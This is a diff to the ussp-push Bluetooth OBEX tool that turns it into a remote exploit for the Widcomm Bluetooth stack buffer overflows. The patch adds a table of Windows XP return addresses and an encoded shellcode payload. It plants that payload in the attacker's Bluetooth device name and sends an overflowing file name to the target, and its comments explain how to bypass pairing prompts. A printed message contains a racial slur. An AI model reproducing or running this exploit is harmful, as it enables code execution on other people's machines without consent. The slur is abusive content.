--- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400 +++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500 @@ -1,4 +1,10 @@ /* + http://www.digitalmunition.com + Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. + http://www.pentest.co.uk/documents/ptl-2004-03.html + +*/ +/* * UNrooted.net example code * * Most of these functions are just rips from the Affix Bluetooth project OBEX @@ -62,7 +68,10 @@ #include "obex_socket.h" -#define UPUSH_APPNAME "ussp-push v0.4" +#include +#include + +#define UPUSH_APPNAME "BluePIMped v0.1" #define BT_SERVICE "OBEX" #define OBEX_PUSH 5 @@ -316,6 +325,9 @@ switch (event) { case OBEX_EV_PROGRESS: printf("Made some progress...\n"); + sleep(3); + printf("Peace nigga...\n"); + exit(0); break; case OBEX_EV_ABORT: @@ -382,9 +394,7 @@ name = remote; name_len = (strlen(name)+1)<<1; - if( (namebuf = g_malloc(name_len)) ) { - OBEX_CharToUnicode(namebuf, name, name_len); - } + namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. buf = easy_readfile(path, &file_size); if(buf == NULL) { @@ -424,6 +434,24 @@ return err; } +static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual... +{ + int s = hci_open_dev(hdev); + + if (s < 0) { + fprintf(stderr, "Can't open device hci%d: %s (%d)\n", + hdev, strerror(errno), errno); + exit(1); + } + if (opt) { + if (hci_write_local_name(s, opt, 2000) < 0) { + fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n", + hdev, strerror(errno), errno); + exit(1); + } + } + +} /* * That's all there is to it. With it all setup like this all I have to do @@ -434,19 +462,87 @@ int main( int argc, char **argv ) { - if ( argc != 4 ) { - printf("%s\n\n" - "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n" - "\tDEVICE = RFCOMM TTY device file\n" - "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n" - "\tLFILE = Local file path\n" - "\tRFILE = Remote file name\n\n", - UPUSH_APPNAME, argv[0]); +/* + The following may be necessary in hcid.conf to prevent the pairing prompts. + + # Authentication and Encryption (Security Mode 3) + auth disable; + encrypt disable; +*/ + + struct + { + char *os; + u_long ret; + } + targets[] = + { + { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e }, + { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e }, + { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e }, + { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e }, + { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e }, + { "[ Crash ]", 0x41424344 }, + }, v; + + if ( argc != 3 ) { + printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]); + printf("Types:\n"); + int i; + for(i = 0; i < sizeof(targets)/sizeof(v); i++) + printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os); + return( -1 ); } - printf( "pushing file %s\n", argv[2] ); - if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) { + /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */ + /* Size=224 Encoder=ShikataGaNai http://metasploit.com */ + /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ + /* this still crashes the BTStackServer.exe... but oh well */ + unsigned char scode[] = + "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7" + "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f" + "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03" + "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16" + "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7" + "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4" + "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04" + "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54" + "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f" + "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5" + "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c" + "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73" + "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03" + "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a"; + + set_device_name(0,0,scode); + //printf("RENAME DONE: SET NEW NAME TO %s\n",scode); + //printf( "pushing file.\n"); + + char buf[3000]; + memset(buf,'\0',sizeof(buf)); + memset(buf,'Z',3); // Sometimes u need 3 z's + + int type = atoi(argv[2]); + if(type) + { + printf("[-] Selected target:\n"); + printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os); + } + + int x; + for(x=0; x<=122; x=x+1) + { + memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4); + } + // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\\Name with shellcode + if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) { + printf( "error\n" ); + return( -1 ); + } + printf("\nsleeping 3 seconds before triggering the shellcode\n"); + sleep(3); + if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) { printf( "error\n" ); return( -1 ); }